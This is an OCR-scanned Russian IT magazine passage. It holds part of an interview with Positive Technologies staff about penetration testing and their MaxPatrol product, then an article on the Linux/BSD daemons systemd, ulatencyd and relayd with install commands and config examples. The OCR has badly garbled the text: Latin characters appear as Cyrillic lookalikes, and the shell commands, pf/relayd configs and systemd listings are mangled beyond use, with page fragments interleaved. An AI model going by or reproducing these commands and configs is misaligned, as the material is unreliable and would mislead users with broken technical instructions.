из различных областей и подразделений, инициирует и поддерживает 
исследовательские проекты, в общем — двигает компанию вперед. 
Второй важный момент — это неумение работать вполсилы. На 
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МахРаІгоІ — продукт, который находится в фокусе интересов РТ 




Дмитрий Евтеев — эксперт по информацион- 
ной безопасности РТ 



Сергей Гордейчик — технический директор 
РТ 



определенном этапе развития понимаешь, что сделать 
«как-нибудь без фанатизма» гораздо тяжелее, чем сделать 
просто хорошо. Времени уйдет столько же, но будет скучно 
и противно. Вот так и живем. 

[АЛ]: Тест на проникновение — распространенная услуга 
среди компаний, занимающихся консалтингом в области 
ИБ. Она должна показать возможность проникновения в 



систему или же выявить все уязвимости инфраструктуры? 
И если второе, где здесь грань между аудитом и пенте- 
стом? 

Дмитрий Евтеев (компания Розіііѵе ТесЬпоІодіез) 

[Е]: Действительно, в наших пентестах грань между тести- 
рованием на проникновение и классическим аудитом 
практически стирается. В первую очередь это связано с 




> сіѵсі 

На дискеты найдешь 
подборку подкастов 
«100% Ѵігиз Ргее 
Росісазі», в которой 
Александр Матро- 
сов задает вопросы 
Сергею Гордейчику 
и Дмитрию Евтееву, 
а та кже о б сужд а ет с 
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бытия в индустрии ИБ 
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СЦЕНА 



желанием предоставить максимально каче- 
ственную услугу, которая должна помочь 
клиенту правильно выстроить процессы управ- 
ления информационной безопасностью. Для 
того, чтобы этого достигнуть, мы уже начинаем 
практиковать подход проведения тестирова- 
ния на проникновение по результатам аудита 
всех имеющихся систем с использованием 
нашего продукта МахРаІгоІ. Это позволяет 
не только указать клиенту на все имеющиеся 
бреши в информационной системе, но также 
и продемонстрировать, использование каких 
недостатков может привести к нежелательным 
последствиям. 

[АЛ]: С 2008 года усилия «позитивных» раз- 
работчиков сконцентрированы на продукте 
МахРаІгоІ. Насколько нам известно, компания 
успешно использует его в различных про- 
ектах, а также в ходе оказания услуг. Однако 
по-прежнему отсутствует демонстрационная 
версия этого продукта. С чем связан этот факт? 
[П: Система МахРаІгоІ, в отличие отХЭрісІег, 
ориентирована на рынок Епіегргізе. Как-то 
ограничить его функции для демо-версии и не 
потерять существенную часть возможностей 
непросто. Поэтому мы пошли по пути пилотных 
проектов, которые проводятся у заказчиков 
бесплатно. К тому же, МахРаІгоІ весьма мощ- 
ный инструмент, использование которого не по 
назначению может привести к существенным 
проблемам. Мне до сих пор периодически 
приходится отвечать на гневные звонки ком- 



паний, которых «ломает компания ХЭрісІег» с 
помощью «утекших» версий ХЭрісІег. 

[М]: В описании функционала системы мони- 
торинга ИБ МахРаІгоІ есть упоминание о 
наличии механизмов контроля соответствия 
стандартам. Есть ли в списке этих стандар- 
тов становящийся все более актуальным 
«Стандарт защиты информации в индустрии 
платежных карт» (РСІ 055)? 

[Е]: Разумеется. 

[ЛЛ]: Были ли в вашей практике ведения кон- 
салтингового бизнеса случаи столкновения 
с клиентами в вопросах легитимности тестов 
на проникновение или используемых методик 
при пентестах? 

[Е]: Не было и мы делаем все возможное, 
чтобы подобных случаев не ожидалось и в 
будущем. 

[ЛЛ]: Каких ИБ-специалистов не хватает на 
российском рынке труда и каков, на твой 
взгляд, общий уровень среднестатистического 
«дипломированного специалиста» в области 
защиты информации? 

[Е]: К сожалению, рынок ИБ-специалистов 
в России оставляет желать лучшего. Очень 
мало хороших технических специалистов по 
обеспечению безопасности промышленных 
СУБД и по направлению Епіегргізе Эесигііу. 
Видимо поэтому мы демонстрируем сценарии 
пентестов, в которых удается получить управ- 




Исследовательский центр РТ 
«засветился» на главной странице 
боодіе 

ление над корпоративной сетью и всеми ее 
информационными ресурсами буквально за 
несколько дней. 

[АЛ]: Какими знаниями в области ИБ должен 
обладать кандидат, чтобы оказаться в вашем 
«позитивном» коллективе? 

[Г]: Сложно сказать. Сейчас у нас откры- 
то более тридцати вакансий ( ЬИ.ги/ 
етрІоѵег/26624 ). Все они для людей с разны- 
ми знаниями, навыками и даже типом харак- 
тера. Главное — уметь и любить работать, а 
также, что называется, стремиться «расти над 
собой». 

[ЛЛ]: Существуют ли у РТ какие-либо дочерние 
проекты, связанные с привлечением «потен- 
циальных кадров», то есть ориентированные 
на студентов? 

[Е]:В настоящее время нет, но мы прорабаты- 
ваем этот вопрос. 



Интерфейс новой версии ХЗрісІег напоминает интерфейс ЛЛахРаігоІ 
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Лого компании на стене 



[АЛ]: Расскажи, пожалуйста, как часто приходится выезжать в команди- 
ровки в другие города с целью оказания оп-зііе услуг? 

[Е]: Довольно редко, так как при оказании услуг по тестированию на 
проникновение кроме анализа защищенности беспроводных сетей 
физическое присутствие не требуется. Более того, даже провести ана- 
лиз защищенности ѴѴі-Рі можно выполнить удаленно. Например, путем 
анализа конфигураций сетевого оборудования и рабочих станций. 

[М]: Существует ли у специалистов, не проживающих в Москве, воз- 
можность официально сотрудничать с компанией? 

[П: Н икаких противопоказаний для этого нет. Но, как правило, к внеш- 
татным сотрудникам выше требования в части самоорганизации. 

[ЛЛ]: Планируется ли открытие офисов Розіііѵе ТесЬпоІодіез в других 
городах? 

[Г]: Планируется, и уже открываются. Но деталей приводить не буду до 
официального объявления. 

[АЛ]: Какие приоритетные направления для своего дальнейшего раз- 
вития на рынке информационной безопасности выделяет ваша ком- 
пания? 

[Г]: Основным направлением развития компании Розіііѵе ТесЬпоІодіез 
является разработка продуктов, направленных на автоматизацию 
ключевых процессов информационной безопасности: управление 
рисками и соответствие как внутренним, так и внешним стандартам. 
Текущие продукты и продукты, которые готовятся к выпуску, так или 
иначе укладываются в концепцию ОРС (Ооѵегпапсе, Різк, Сотрііапсе). 
Линейка продуктов Розіііѵе ТесЬпоІодіез — это основа интегрирован- 
ного Бесигііу Орегаііопаі Сепіег, набор компонентов для управления 
уровнем реальной защищенности в крупных корпорациях. Из узких 
направлений, которые мы в настоящее время активно развиваем в 
продуктах, это управление защищенностью бизнес-критичных при- 
ложений, таких как системы ЕРР, приложения дистанционного банков- 
ского обсаживания (ДБО) и автоматизированные банковские системы 
(АБС). Крайне интересное и сложное направление — системы управ- 
ления производственными задачами, такими как оборудование опера- 
торов связи (ѴОІР, РВХ, 30), а также АСУ ТП/5САБА. Плотно работаем в 
области безопасности госуслуг. 

Что касается моих персональных интересов, то я все больше и больше 
ухожу из сферы компьютерной безопасности в сферу безопасности 
информационной. Информация — огромная сила, одна из стихий, 
которая во многом определяет тот мир, в котором мы живем. 

[М]: Какую область информационной безопасности ты считаешь наи- 
более перспективной для становления и развития бизнеса в этой 
индустрии? 

КІ: Сейчас большое внимание индустрии уделено безопасности 
ЗСАБА-систем. Полагаю, что это весьма перспективное направление. 
[М]: Уверен, ты следишь за крупными веб-ресурсами и форумами 
И Б -тематики. Какие, на твой взгляд, темы, связанные с областью 
информационной безопасности, недостаточно хорошо освещены на 
просторах рунета? 

И: В рунете довольно плохо освещены вопросы, связанные с безопас- 
ностью промышленных систем. Таких, как, например, ЕРР или БСАйА. 




В главном офисе компании даже картины напоминают 
о том, где ты находишься... 



Впрочем, информации по указанным направлениям и на зарубежных 
ресурсах крайне недостаточно. 

[ЛЛ]: Собирается ли РТ получить лицензию на оказание квалифициро- 
ванных услуг по оценке соответствия требованиям стандарта РСІ 055? 
[Г]* Несмотря на то, что РСІ 055 отнюдь не основное направление 
деятельности компании, мы имеем широкую экспертизу в безопас- 
ности банковских технологий. С 2008 года Розіііѵе ТесЬпоІодіез 
имеет статус РСІ 055 ОБА Аззосіаіе, с 2006 года оказываем услуги 
по тестированию на проникновение и оценке защищенности ѴѴеЬ- 
приложений в рамках стандарта РСІ 055. В данный момент подтверж- 
даем статус РСІ 055 А8Ѵ. Система МахРаІгоІ широко применяется 
ведущими ОБА и А5Ѵ для проведения работ в области информацион- 
ной безопасности. 

[АЛ]: В вашей компании есть исследовательская лаборатория. 
Расскажи, чем сейчас занимаются в ее стенах? Какие результаты ее 
исследований позволят вам «захватить мир»? 

[Е]: Да, сейчас целое подразделение трудится в исследовательской 
лаборатории. И в ее стенах уже существуют разработки по «захвату 
мира» :) Но это военная тайна. 

[ЛЛ]: В конце 2010 года исследовательский центр компании был отме- 
чен благодарностью Ооодіе за обнаружение ряда уязвимостей в сер- 
висах. Насколько мне известно, ты, Сергей, лично нашел некоторые 
уязвимости. Был ли данный поиск целенаправленным (в частности, с 
использованием программных продуктов компании) или баги обнару- 
жились относительно случайным образом? 

[Г]: Персонально я, к сожалению, не участвовал — конец года слиш- 
ком «жаркая» пора. Что касается этого и других проектов, то мы 
следим за подобными инициативами и с удовольствием отклика- 
емся на просьбы вендоров оценить свою защищенность. Тем более 
«захокать Ооодіе», да еще и без долгих убеждений разработчика в 
том, что «БОБ Іщесііоп — это серьезно». Это Іип, а упускать возмож- 
ность повеселиться не хочется. Уязвимости были обнаружены пен- 
тестерами Розіііѵе ТесЬпоІодіез менее чем за один день. Надо отдать 
должное Ооодіе, он подтвердил и устранил их весьма оперативно. 
Автоматизированные продукты в ходе работ использовать не разре- 
шалось, поэтому МахРаІгоІ пылился на полке. 

В процессе подготовки данного материала на официальных веб- 
ресурсах компании и в блогах сотрудников появилась информация о 
том, что 19 мая 201 1 года состоится международный Форум «Розіііѵе 
Наск йауз», организатором которого является «Розіііѵе ТесЬпоІодіез». 
На официальном сайте мероприятия сформулирована дерзкая миссия 
данного проекта: «Объединить хакеров и компании И Б- индустрии, 
чтобы они смогли понять, насколько они нужны друг другу. На 
форум приглашены самые продвинутые знатоки из России, Европы, 
США и Китая, представители ведущих российских и зарубежных 
ИТ-компаний, независимые эксперты». 

Инсайдеры нашего журнала не оставят без внимания данный форум, 
предоставив тебе порцию позитивной информации с места событий. 
Не пропусти, т 
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■ ■ Евгений Зобнин (гоЬпіпіадтаіІ.сот) 



ДЕМОНИЧЕСКАЯ 

СИЛА 

Изучаем $у$ІетсІ, иіаіепсусі, геіаусі и ^зссі 

• Системные демоны - одна из ключевых подсистем ІЖІХ. От того, 
насколько хорошо и правильно они написаны, зависят не только воз- 
можности операционной системы, но и такие параметры, как удоб- 
ство использования и даже скорость работы. В этой статье мы рас- 
смотрим четыре примера правильной реализации демонов, которые 
способны сделать работу в системе удобнее, эффективнее и быстрее. 



зузТетсІ: быстрее света 

Схема загрузки типичного І_іп их- дистрибутива выглядит пример- 
но так: ядро инициализирует железо и запускает процесс 
/зЬіп/іпіІ, который, в свою очередь, запускает инициал изаци о иные 
скрипты. Скрипты монтируют файловые системы, настраивают 
сеть, различные устройства и начинают последовательный запуск 
демонов: зузіодсі, сгоп, сирз и прочих, которые перечислены в кон- 
фигурационных файлах. В самом конце іпіі запускает менеджер 
входа в систему: деііу или хсіпп (ксіт, дсіт). Просто и логично, не 
так ли? Однако такая схема довольно примитивна, авсравнениис 
ѴѴіпсіоѵѵб и Мае 05 X та к и вообще архаична. Их системы инициали- 
зации запускают задачи параллельно, не дожидаясь завершения 



одной, чтобы передать управление следующей. Если одна из них 
застопоривается на операции ввода- вы вода, управление сразу 
получает другая, так что общее время загрузки сокращается, да 
так существенно, что традиционная система оказывается далеко 
позади. 

В мире Ып их та к ведет себя только ІІЬипІи, да и то только послед- 
ние два года. Все остальные продолжают по старинке последо- 
вательно грузить систему или используют самосборные костыли, 
которые распараллеливают процесс загрузки неумело и часто 
ошибочно (Оепіоо и АгсЬ, привет!). По-настоящему универсальное 
решение не найдено до сих пор, поэтому над идеей параллельной 
системы инициализации работают многие программисты. 
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Связь иіаіепсусі и остальных компонентов ОС 



В і + геіаусі: прозрачное 
роксирование 
с фильтрацией запросов 



#ѵі/еІс/р1.сопІ 

# Перенаправляем все входящие ілііліілі- запросы 
от наших клиентов на геіаусі 

гсіг оп $іп1:_і-р іпеі: ргоііо Ііср -Ргот $1ап 1:о апу \ 
рог! ыыы і:а§ ІІМТІлІЕВ -> ІоѲ рогі: 8080 

# Разрешаем прохождение сетевых пакетов 

разз іп 1о§ оп $іп1і_і-р іпеі: ргоііо ѣср -Ргот $1ап\ 
ѣо 1о0 рогі: 8080 Па§5 5/5А зупргоху зііаііе \ 
іа§§есІ ІІМТІлІЕВ 

#ѵі/еІс/геІаусІ.сопІ 

И1:1:р ргоіосоі " М1:1:р1п11:ег " { 

# Задаем параметры ТСР-соединения 

Іср { посіеіау, заек, зоске! ЬиТТег 65536, 
Ьаск1о§ 1000 } 

# Блокируем запросы от устаревших браузеров 

ІаЬеІ "ВАй изег а§еп1і" 
гециезі: беасіег Рііііег "МоііІІа/4.0* " -Ргот 
"ІІзег-А§еп1і" 

# Запрещаем доступ к некоторым сайтам 

ІаЬеІ "ВАй Нозі: гедиез!" 
гериезі: Ріеасіег Рііііег " *уои1:иЬе. сот* " -Ргот 
"Ноз-р" 

гериезі: Ріеасіег Рііііег " *ТасеЬоок. сот* " -Ргот 
"Ноз-р" 

# Подменяем информацию в заголовках 

гециезіі Ііеасіег сбап§е "Ассер1і-І_ап§иа§е" 

■ро "ги-ги,ги;д=0.9" 



Леннарт Поттеринг, сотрудник Веб Н аР и автор 
РиІзеАисІіо, один из них. Его последнее достижение 
— демон зузіетсі, очередной претендент на звание 
убийцы /зЬіп/іпіР, мимо которого можно было бы спо- 
койно пройти, если бы идея, заложенная в его основу, 
не оказалась столь интересной и правильной. 

Зузіетсі отличается отлюбой другой системы инициа- 
лизации тем, что намеренно делает сложные вещи 
простыми. 99% всех остальных параллельных систем 




Справочная страница ІзссІ занимает немно- 
гим больше одного экрана 



инициализации провалились просто потому, что в 
сравнении с простым и понятным даже дикарю /збіп/ 
і п ІР они выглядели тяжеловесными монстрами. Чтобы 
обеспечить возможность параллельного запуска, не 
введя ОС в противоречивое состояние (которое может 
возникнуть, если, например, пытаться настроить сеть 
до загрузки сетевых драйверов или запустить демоны, 
не смонтировав нужную ФС), использовались раз- 
личные методы синхронизации. В основном это были 
своеобразные «метки зависимостей», которые не 
давали очередному шагу инициализации отработать, 
если не был пройден шаг, описанный в его зависи- 
мостях. Например, сгоп зависит от зузіод, потому что 
ему надо вести логи; зузіод зависит от настойки сети, 
потому что он способен принимать логи от удаленных 
машин и так далее. Из-за этого инициализационные 
скрипты превращались в запутанную вереницу блоков 
а их составление значительно усложнялось. Зузіетсі 
организован намного проще, он не следит за зависи- 
мостями, а просто запускает все, что есть, одновре- 
менно. 

Я не шучу. Зузіетсі использует механизмы контроля 
зависимостей только на самых ранних этапах инициа- 
лизации, которые так или иначедолжны происходить 
последовательно (монтирование корневой файловой 
системы, подключение зѵѵар, загрузка модулей и так 
далее). Когда же дело доходит до демонов, на запуск 
которых уходит 90% всего времени инициализации ОС, 
зузіетсі забывает о зависимостях и стартует их всех 
сразу, показывая просто потрясающую скорость. 

Это работает благодаря тому, что зузіетсі знает об 
особенности работы демоновиихсвязи между собой. 
Ведь на самом деле демонам нужны вовсе не дру- 
гие демоны, а только «коммуникационные каналы», 
обеспечивающие обмен данными: сгоп не зависит от 
зузіод, ему нужен сокет/беѵ/іод, в который он сможет 




[ НТТР://ѴѴѴШ 

■ ■ 



> Ііпкз 

• дом зузіетсі под 
крылом: Ігеесіезкіор 
огд/ѵѵікі/ЗоІІѵѵаге/ 
зузіетсі : 
ігеесіезкіор.огд 

• исходные тек- 
сты зузіетсі: сдіі. 
ігеесіезкіор.огд/ 
зузіетсі : 

• код иіаіепсусі: 

д ІІЬ и Ь.сот/ роеі^і/ 
иіаіепсусі : 

• ИСХОДНИКИ ІЗССІ : 

реоріе.ігеебзсі. 

огд/~ІгбосІе5/І5с . 




• В долгосрочной 
перспективе автор 
собирается превра- 
тить зузіетсі в полно- 
ценный менеджер 
сессий, способный 
заменить дпоте- 
зеззіоп и кбеіпіі. 

• Кроме всего проче- 
го, зузіетсі обладает 
функциями монитора 
для демонов, так что 
возможности ІЗССІ 
встроены в него от 
рождения. 

• Отказ от исполь- 
зования скриптов 
— один из методов 
ускорить процесс 
загрузки. Многие за- 
дачи инициализации 
зузіетсі способен 
произвести через 
прямой вызов нужных 
команд, без исполь- 
зования скриптов. 

• Прежнее название 
геіаусі — бозіаіесі 
(от слов бозі зіаіе, 
«состояние хоста»), 
было изменено на 
теперешнее в связи с 
расширением функ- 
ционала. 
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ІІЫІХОЮ 
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III ОСцл чэещдйои 

■ Интервал «чу гінйерквні гатоВ на дялѵиил» МЙ гспіич 1 

іп:ігѵйі Ій 

1 ТАйгЮуТ і]!№ ПрСйЦКи №.Т(Й «4 фОСТДОНОСТЪ И?ТО 0 ^і !№ 

I (нш ккт нв пЙвчиі дм» ЗтМ ж - он & двцсі 
Іімкиі МВ 

I Рааоеліен сц&ер на 9 ідодасай вгм Бегее мнтАной 
I обработки зйприсий 
рЫмк 5 

>9 ЛогщкЛаты резцлытѵіы проборки линий ін двстѵяюсть 

Конфигурируем геіаусі 



записывать свои логи, это же справедливо и в отношении любого 
другого демона. Все они общаются через сокеты, и единственная 
причина, почему демон А должен быть запущен раньше демонов 
В, С и 0, заключается в том, что демон А должен создать сокет, ко- 
торый им нужен. Зузіеппсі учитывает эту особенность, поэтому его 
механизм параллельного запуска основан на сокетах, которые он 
создает для каждого демона заблаговременно, а затем запускает 
демоны одновременно. При этом ответственность за синхрони- 
зацию и «отслеживание зависимостей»теперь перекладывают- 
ся на ядро, в рамках которого и реализован механизм сокетов. 
Если, например, сгоп получит управление раньше зузіод, ничего 
страшного не произойдет — сгоп найдет свой любимый /беѵ/іод 
и даже сможет писать в него сообщения (если захочет, конечно), 
которые будут, нет, не выброшены, а буферизированы в сокете, но 
только до тех пор, пока сгоп не захочетзаписать в сокет сообще- 
ние, способное его переполнить. В этом случае ядро заблокирует 
процесс сгоп и передаст управление следующему процессу в 
очереди на исполнение (следующему демону). Вскоре (а может 
быть и сразу) очередь дойдет и до зузіод, который запустится, про- 
читает сообщения, скопившиеся в /беѵ/іод, обработает их и сам на 
чем-нибудь заблокируется (либо истратит отведенное ему время), 
и управление перейдет следующему демону. Типичная многоза- 
дачность без лишних костылей. 

Более того, благодаря такой схеме большинство демонов могут 
быть запущены только тогда, когда в них возникнет реальная 
необходимость. Так, например, СІІР8 вовсе не обязательно за- 
пускать во время инициализации ОС, когда нагрузка на систему 
и без того высока. Логичнее стартануть его, когда на печать будет 
отправлен первый документ. Зузіеппсі позволяет сделать такое, 
следя за активностью вокруг сокетов, и применяет похожий под- 
ход для монтирования файловых систем, подключая их к точкам 
монтирования только при попытке получить доступ к файлам 
(также демоны могут быть запущены при появлении в системе 
определенного файла-устройства). 

Справедливости ради стоит сказать, что столь гениальное реше- 
ние проблемы зависимостей было придумано и реализовано в 
МасОЗХссамогоначалаее существования, но до автора зузіеппсі 
почему-то никто не обращал на это внимания. 

Кстати, у самого зузіеппсі есть другая и явно уникальная для Ыпих 
характеристика: он умеет группировать процессы с помощью 
едгоирз с установкой различных лимитов среды исполнения на 
всю группу (ограничения ресурсов, рабочий и корневой каталоги, 
иппазк, настройки 00М кі Пег, параметр піее, приоритет операций 
ввода-вывода, приоритеты использования процессора и многое 
другое). То есть де монов теперь можно помещать в виртуальные 
окружения без использования какого бы то ни было дополнитель- 
ного ПО, просто прописав в файл настроек зузіеппсі несколько 
строк. 



/1 л 

Зузіеппсі уже доступен для скачивания и возможно будет включен 
в один из будущих релизов Ребога в качестве альтернативной 
системы инициализации. Инструкции поустановке в другие дис- 
трибутивы можно найти на официальной страничке: іпе^ 
огд/ѵѵікі/ЗоІІѵѵаге/зузІеппб . 

Установить Зузіеппсі в ІІЬипІи можно, выполнив следующие ко- 
манды: 

$ біісіо абб-ар1:-геро5І1:опу рра : апбпеы-ебтипбз/рра 
$ зисіо ар1:-§е1: ирбаііе 
$ зисіо ар1:-§е1: Іпз1:а11 зуз1:етб 

Далее следует отредактировать/Ьооі/дпиЬ/дпиЬ.сІд, добавив к 
параметрам ядра строчку і п І1=/збі п/зузіетсі . После перезагрузки 
дистрибутив будет работать с новой системой инициализации, в 
чем можно убедиться с помощью команды: 

$ зисіо зуз1:етс1:1 ипіііз-іізі: 

Для проверки состояния, запуска, остановки и включения служб 
используются аргументы 5ІаІиз, зіагі, зіор и епаЫе. 

иіаіепсус): мгновенная реакция 

Какой, на твой взгляд, самый важный параметр десктопной 
операционной системы? Хороший графический интерфейс? 
Количество доступных приложений? Простота использования? 
Да, все это имеет значение, но сегодня, когда этими свойствами 
легко наделить даже серверные ОС, решающими становятся 
совсем другие факторы, важнейший из которых — отзывчивость 
системы. 

Хорошая десктопная ОС должна жертвовать всем в угоду высокой 
скорости реакции. Неважно, какую скорость она показывает при 
записи файлов на диск, сколько десктопных эффектов предлагает 
пользователю, правильно ли реагирует на внезапное извлечение 
флешки, все это не будет иметь никакого значения, если ОС за- 
ставляет пользователя ждать. 

Для разработчиков операционных систем это прописная истина, 
поэтому во все времена они стремились сделать свои ОС более 
интерактивными. У одних это получалось хорошо (привет ВеОЗ), 
у других плохо (куда же без М3), но были и такие, у кого это не по- 
лучалось вообще. Долгое время разработчики Ыпих совершенно 
не интересовались темой отзывчивости Ыпих на десктопах. Кон 
Кол и вас множество раз указывал им на проблемы, говорил о непо- 
воротливости и медлительности Ыпих, писал патчи, ночами кодил 
новые планировщики задач, добивался их включения в ядро. Все 
напрасно, раз за разом патчи отвергали, а самого автора грубо 
отстраняли отдел. 

Однако со временем труды Кона Коливаса окупились. Инго 
Молнар начитался его исходников и написал планировщик СР5 
(Сотріеіеіу РаігЗсІпебиІег), а Линукс незамедлительно вклю- 
чил его в ядро 2.6.23. После этого положение дел на десктопах 
существенно улучшилось, и Ыпих стал намного быстрее (при этом 
реализация Кона все равно продолжала показывать более впечат- 
ляющие результаты). 

Второй важной вехой на пути Ыпих к десктопу стало включение 
знаменитого 200-страничного патча в ядро 2.6.38, а также по- 
явление его аналога на языке ЬазЬ . Так Ыпих научился отделять 
интерактивные процессы от всех остальных демонов, серверов и 
Ьазб-скриптов и наделять их более высокими приоритетами. Это 
событие еще больше улучшило ситуацию и сделало ее практиче- 
ски идеальной: теперь Ыпих не тормозил даже тогда, когда в фоне 
шла пересборка ядра в несколько потоков. 

Наконец, третьим важным шагом для десктопного Ыпих (здесь я 
подхожу к самому главному) стало появление демона иіаіепсуб, 
способного регулировать отзывчивость системы динамически, 
подстраивая ее под изменяющиеся обстоятельства. 



► 092 
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Правила иіаіепсусі кажутся сложными, однако все они очень похожи друг на друга 
и пишутся по одному шаблону 



Как и ядерный патч, иіаіепсусі использует механизм сдгоирз для 
группировки интерактивных процессов и изменения их приори- 
тетов, но на этом его работа не заканчивается. Демон использует 
эвристические алгоритмы для выявления «наиболее интерак- 
тивных» процессов, а также явных вредителей системы, таких 
как форк-бомбы и программы с большими утечками памяти. При 
этом первые получают еще больший приоритет, а вторые жестко 
урезаются в возможностях (получая низкий приоритет, ограни- 
чения на доступную память), изолируются или уничтожаются. Но 
что самое главное, в любой момент демон можно обучить новым 
правилам отбора процессов, так что мы теперь можем назначать 
самые высокие (даже реалтаймовые) приоритеты любимым играм, 
видеоплеерам и браузерам. 

Демон поддерживает плагины, поэтому его функциональность 
может быть расширена до просто фантастических возможностей. 
Например, уже сейчас доступен плагин (причем в стандартной 
комплектации), который следит за работой пользователя в иксах и 
назначает самые высокие приоритеты вновь открытым приложе- 
ниям и процессам, окна которых находятся на переднем плане. 
Чтобы установить иіаіепсуб, необходимо скачать его исходники со 
страницы Ыір5://діІбиЬ.сот/роеІ2І/иІа1:епсѵб и собрать с помощью 
стандартных стаке и таке: 

$ стаке 

$ таке 

$ біісіо таке іп5І:а11 
Далее демон можно запустить: 

$ біісіо /и5г/1оса1/5Ьіп/и1а1:епсусІ -ѵ 2 



И понаблюдать за тем, как он группирует процессы по приорите- 
там: 

$ рБ ха-Р -ео рісД БеББІоп, аг§5, с§гоир 

Никаких настроек производить не нужно. По умолчанию демон 
отдает предпочтение мультимедийным и наиболее используемым 
интерактивным приложениям, оставляя фоновые задачи спокойно 
работать, не мешая основной системе. 

геіаусі: по трем фронтам 

Какая связь между мониторингом сетевых хостов, балансировкой 
нагрузки и прокси-сервером? Все это функции одной машины? 

Да, вполне возможно. Но что если я скажу, что все эти три функции 
тесно связаны между собой и должны быть реализованы в рамках 
одного универсального приложения? Бред? Никак нет. 

Возьмем, к примеру, достаточно распространенную в узких кру- 
гах функцию сервера под названием «распределение нагрузки 
между несколькими О N 5-сервера ми». Что нужно дляеереше- 
ния? Во-первых, умение перенаправлять Б N 8-трафик на другой 
хост (от балансировщика к одному из реальных 0І\І5-серверов). 
Это можно сделать с помощью брандмауэра или особым образом 
настроенного В I N 0 (несколько тяжеловесный вариант). Во- 
вторых, умение выбирать наиболее подходящего кандидата для 
обработки запроса из списка 0145- серверов. Это уже сложнее, 
и здесь может понадобиться специализированное ПО или опять 
же брандмауэр (но очень хороший). В-третьих, умение проверять 
0І\І5-сервера на доступность и удалять упавших из списка. Нужен 
скрипт, пингующий хосты и управляющий списка ми, либо особые 
возможности брандмауэра (а такой есть?). В общем, долгое нуд- 
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ЦУпіі] 



Ое$сг і рі іоп=0реп55Н Оветоп 

Н1іег=5уз 1 од . Іагдеі ззікідепкеуз ■ зегѵ ісе 

Веди іг ез=ззІ*ісІдепкеуз . зег ѵ ісе 

[Зегѵісе] 

Е«ес5івг1;=/и5г/зЫп/55іісІ -О 
ЕмесВе1оегі=/Ып/кШ -НУР фпПІНРШ 
Кі 1 ІМосІе^ргосезз 
Кезіаг1:=а1шау5 
51апйап](ЭиіріЛ~зуз1ад 

Еіпзіаі 11 

НапІегіВу=ти И і -изег . іагдеі 

И Иоіе ІІіэІ: ІЬіз Із ІЬе зегѵісе Ше Іог гиппіпд а зіпдіе 55Н зегѵег Тог аіі 
В іпсотіпд соппесііопз, зиііаЫе опіу Тог зузіетз шіТТі а Ізгде атоипі оТ 55Н 
# ІгаТТІс. Іп аіітозі а 1 1 оіПег сазез іі із а ЬеНег ійеа То узе езГісІ , зоскеТ + 
В ззИсІЭ. зегѵісе (і.е, ТНе оп-сіетапгі зрашпіпд ѵегзіоп Тог опе іпзТапсе рег 
В соппесТіоп), 



Пока в $у$ІетсІ еще можно увидеть метки зависимостей (опция «Аііег»), но это временная мера для обхода багов 
зузіод 




ное велосипедостроение или покупка специализированного ре- 
шения для конкретной задачи по нереальным ценам. А что если 
завтра вдруг понадобится сделать нечто подобное для 5МТР? 

Все править или вновь открывать кошелек? Не стоит, содержимое 
кошелька все-таки лучше приберечь, а костыли с велосипедами 
оставить спортсменам. 

Демон геіауб, появившийся вО ре пВ50 4.3, позволяет решить эту 
и еще огромное количество других, подобных и не очень, задач 
всего за несколько минут. 

Он включает в себя возможности балансировщика нагрузки для 
протоколов уровнейЗ,4и7, прокси уровня 7 (релей) и сервиса 
проверки доступности сетевых узлов (из которого и вырос). 

На основе геіауб можно строить самые разные конфигурации, 
начиная от простых прокси-серверов или 55І_-акселераторов и 
заканчивая сложными решениями вроде прозрачных ѵѵеЬ-прокси 
с фильтрацией запросов и распределением нагрузки между 
несколькими ѵѵеЬ-серверами. И все это с помощью простого 
конфигурационного файла, длина которого даже в самых сложных 
конфигурациях редко превышает 50 строк. 

Да, конечно, без примера все это только слова. Так что вот рабочий 
конфиг, полностью удовлетворяющий требованиям, выдвинутым в 
начале раздела: 



### Общие настройки 

# Интервал между проверками хостов на доступность 

# (10 секунд) 
іпѣегѵаі 10 



# Таймаут для проверки хостов на доступность методом ТСР 

# (если хост не отвечает дольше 200 мс - он в дауне) 
Ііітеоиі: 200 



# Разделяем сервер на 5 процессов для более эффективной 

# обработки запросов 
рпеТогк 5 



# Логировать результаты проверки хостов на доступность 
1о§ ирсІа1:е5 



### Настройки РЫБ-протокола 
# Параметры оптимизации соединения 
сІП5 рпо1:осо1 "сІпвЛИгег" { 



ѣср { посіеіау, заек, зоскеі: ЬиТТег 1024, Ьаск1о§ 1000 } 



### Настройки релея 



# ѵі /еіс/геіаусі.соггі 

### Переменные и макросы 

# Адрес и порт нашего релея 
пе1аусІ_асІсІг= ,, 127.0.0. 1" 
^е1аусI_ро^1:= ,, 8053 ,, 



геіау сіпзрпоху { 

# Прослушиваемый адрес и порт 

1із1:еп оп $пе1аусІ_асІсІп рогі: $ге1аусІ_рог1: 



# Работаем с описанным ранее протоколом 
ргоѣосоі "сіпзіііііег" 



# Адреса трех ОИБ-серверов, которые будут обрабатывать 

# запросы 

ѣаЬІе <сІП5_5егѵеп5> { 192.168.1.1, 192.168.1.2, 
192.168.1.3 } 



# Оправляем ЭИЗ-пакеты одному из перечисленных в таблице 

# ОИБ-серверов, предварительно проверив его на доступность 
■РогыагсІ 1:о <сІП5_5егѵег5> рогі: 53 \ 
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ауеіод.еоскеі Іоайесі 

5Ц5ІЕІПСІ-ІПІІСІ I .БЕСкЕІ 1мЙВ[| 

зуэ іелѵі- Ісддег . зпскеі ІоэгіесІ 

ауз Іеімі -вііи I йоыпсі . асе ке I I оай&й 
яв ѵ - з сі л5 . аыар Іоаоей 

Ьааіс.іагдеі ІоосіесІ 

с гуріяе Іир . 1 аг деі 1 оайе й 

йЬиэ.ідгдеі Іоайей 

деі 4ц . і агде 4 1 оайЕ й 

1осаТ-4з , іагдеі Іоайей 

ши Иі-чшѳг, 4 агдеі Іоайвсі 

пвіуагк . ілгдеі ІоайеЯ 

гетоіе-із. іагдеі ІоасІЕсІ 

аоскеіа . Іагдеі Іозйеб 

з о и п я , іагде 4 1 оайе Я 

з иа р . іагде 4 ) оай е Я 

зузіпі I , іагдеі ІоайеЯ 



Бузіетй - , , , еа-с і еап . і ііюг ! оэйей 



асііѵе Иаіегіілд 

асііѵе ІіБІвпіпд 
асііѵе 1 ізІЕпіпд 

асііѵе Шіепіпд 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
асііѵе асііѵе 
